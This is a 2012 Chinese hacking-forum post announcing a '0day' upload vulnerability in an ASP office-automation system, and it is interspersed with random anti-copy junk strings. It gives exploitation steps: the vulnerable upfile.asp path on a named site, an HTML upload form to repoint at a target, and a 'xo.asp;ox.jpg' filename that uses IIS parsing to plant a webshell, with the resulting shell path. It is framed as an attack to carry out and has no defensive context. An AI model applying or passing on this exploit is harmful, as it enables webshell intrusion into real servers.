找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2304|回复: 0
打印 上一主题 下一主题

全能OA办公系统0day OA办公系统漏洞 上传漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-21 13:45:12 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
全能OA办公系统 上传漏洞+ S. {9 J; K4 J
. y0 B; L* m1 F4 ~* `) g
系统介绍:. S4 y0 s: Q1 V! u

- n  O& e  b& D) t, O. H全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。1 k) j. Z( |: J! B9 S) W0 a; P

% u( `" x2 a- U8 c主要功能:9 a! @; B, _2 k5 q1 l  Z
公司通告
# n) e- x- A( r8 Y' a工作计划 . ?" Q; `+ U6 j5 _5 `
通讯助理
( `% T/ o) L7 G' t, ?客户资源
! C% X# j2 G% ]7 z' p5 V我的公文
- }4 }, C. J" \* k, R3 a, d公文传阅
1 ~! |& m1 _" U7 t5 D2 Y; l公共资源 + i1 l; p, p  N
资源预约 7 C/ K. n4 B3 U/ j
今日考勤
' U) a( ~9 \% l6 Y个人计划 9 y( p7 Q& ?) n" d( m& h& i
个人通讯录
& D2 o! l, I8 j$ \- R4 l$ a7 I个人基本档案 3 {- L! {( F% i( a' I; P  p* ]
未读邮件 : N$ l7 _% Y+ b4 n6 z
发邮件 . d/ W5 r# ]6 w3 l: S
收件夹 & O" i' `) [' K6 L: _" N
寄件夹
7 k# {& |- d' ^  C网络硬盘 % b& ?" b; ?$ M% B, D: n
网络会议
9 @- J$ h2 Y7 \1 L1 z7 c7 z# N0 F网络调查 4 X$ y& V8 C# q! H7 ~. Y, L4 u
交流论坛6 f% n  f4 P3 @) ]$ `! }

3 f+ z: I% a$ n3 M0 q/ f' P2 p有兴趣测试的朋友可以下源码看看
# H& d/ Z3 T) Z) Y4 o# ~9 p
, r/ m! d$ R. y9 E6 L源码下载:* Z( a* M- L) Q

5 ?+ p0 w2 t0 p4 I* O( q' j8 N/ d# W2 \  bhttp://www.mycodes.net/30/4750.htm
3 ^% J0 k+ m1 A' c$ Y, Y9 i4 n4 T; o% T
漏洞介绍:7 _7 w, C- P& r0 U: g
! ~2 ]# E. T' Y0 F' m* @
由upfile.asp上传文件漏洞引起
+ J2 u# R' g/ @# r$ S$ ~
  ]5 x5 q$ e' l5 S- l8 U测试方法:7 w7 R- r0 |, R
% w. w1 f" i  s& f# n
使用名小子上传http://www.itlynn.com/upfile.asp即可) d1 R7 R8 s2 Q/ s6 [8 d

/ X. {+ N3 M% m% n; }如果upfile.asp文件被删除不存在。
' J( v) s2 u8 ]3 q: b* e1 v, H1 u6 i$ w- g
  那么可以试着访问http://www.itlynn.com/upfile/upfile.asp
$ K. R3 f0 v' I  T6 P0 c( }( K; y( V0 x, `1 Z
如果存在那么将如下代码保存为upfile.html。* r* V' D' q* t$ N. V6 P- s- l3 z
' p2 a: U. X5 @3 ~! y. L
然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp5 @/ l3 \% y! i& y/ C$ z" e# B

4 x& @" [, ?% U& H4 |
7 Z# Z% q7 T# j) v
  K2 ?. P) v4 {% [  I: t3 Z$ w01 <table border='0' align="center" cellpadding="5"> # K9 h2 @4 w: m  N' g, b  r  m

& g4 ]& n- G& [* k) I02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1"> : D3 ?5 H7 A  R1 g

4 ^) I" T8 _  h9 ~03 <tr>
" p% j; C; V8 h; m& S
( A7 j# I9 ~: l04             <td>报错:</td> * M; i, j/ q4 E6 n+ \9 k4 B

) J, h& I" }( E( ^1 O7 O( \2 k" Z05             <td><input type='radio' name='errnumber' value='0'> 6 Z: z  N. p, g* C3 v4 H5 l$ @
* v4 y  l$ @+ Q4 H7 S# a5 t: H
06               自动更名 ! ~9 s# ]9 E1 ?- z: w+ C( s( I) v

8 _, S9 }8 X4 G07               <input type='radio' name='errnumber' value='1' checked> 4 m6 w- W6 E; {7 e7 d

; @! g2 D; x+ R( Y  d08               报错方式
8 e; v. V" s/ ~4 G  z) f; B
1 {2 F0 w& [- T8 Z2 W+ ~, `09               <input type='radio' name='errnumber' value='2'> 9 q2 Q4 T3 y5 |! `
* g: j& o# c& `$ X
10               直接覆盖</td> 6 E& n2 W9 f& E$ S& q+ B

3 M0 }6 m9 ~( f$ S11           </tr>
( T  }6 t& z# L: I4 }% i. Q9 H( O# w
12           <tr>
: T0 k" e/ Z' O* G6 F8 T) i. n) }+ X1 `5 R$ m9 F& z) q0 I1 w
13             <td>主题:</td>
5 W* T8 [/ i0 f: N- J$ J
& b3 a( X0 X3 J0 z- K& x& L14             <td><input type='text' name='filename' size='30'></td> 5 O- A% {9 A8 D2 q, ?8 `

: e* J. E, s$ ~9 `1 `( r- h15           </tr>
( f3 e+ }9 U; m: |4 R1 w6 y
; n. @8 _5 Z- U# O7 q& z# t: B9 e. T16           <tr>
, d. v) @+ f: v: y3 F: d  t* m2 ]
/ M- [% X0 _' N* b- w; t7 R17             <td>文件:</td> - Q& ^, M' K0 V- t

$ n8 ?& l4 \' G- m$ U' v18             <td><input type="file"name="fruit"size="30"></td>
6 H# Q# S5 {  Y, X, ^- c# m- J/ O. h/ _4 Q: [! X
19           </tr> 5 a! D3 ?. O5 ]' g# y

. C6 K* f0 q) w0 |20           <tr>
' r- k: g; {* B+ |, F* S! A! B0 J
21             <td valign='top'>简介:</td> 9 E3 d# H7 T' ~( w+ f( O) w

2 B6 r; T: p3 c2 `4 h; `22             <td><textarea name='fileExt' cols='40' rows='5'></textarea></td> . r" o0 P7 Z$ }: q- `3 O
1 W' y1 B8 o( {
23           </tr> % ~$ e7 r$ t! o; s/ X  T* ]
6 x+ r) m) ?& w& h; @! S1 ~, K% q! _
24   $ O8 S0 L# }( A, R7 D

& S$ i: h4 w& r# x/ v25             <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td> 7 [# x. e- F9 ?
5 F& U0 X, q/ z
26           </tr> " X2 @6 w+ X! \2 W" V: }9 J
8 m$ H3 H; K: a; U; a( l
27         </form> ' J- U' H0 ?* ]$ r9 [6 {3 j2 ^- O

3 m, }  L$ T( J+ ?然后打开上传一个文件名为xo.asp;ox.jpg的文件。
2 T' W+ h, P; F9 x0 Z! ]  S" z2 W1 @
- _# q# E( E" Q' T3 L
+ R3 t. N7 w2 c1 T
上传成功后,马的路径是:http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg% K6 s7 a, {, L1 }

: d; i4 t$ [6 y9 m- n, q/ ?此漏洞需要配合解析漏洞利用。. b5 d) k( c3 Q: o  g  ]: D7 M
' R. Z( }2 p( B. ?, T) i# ?2 q& A
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表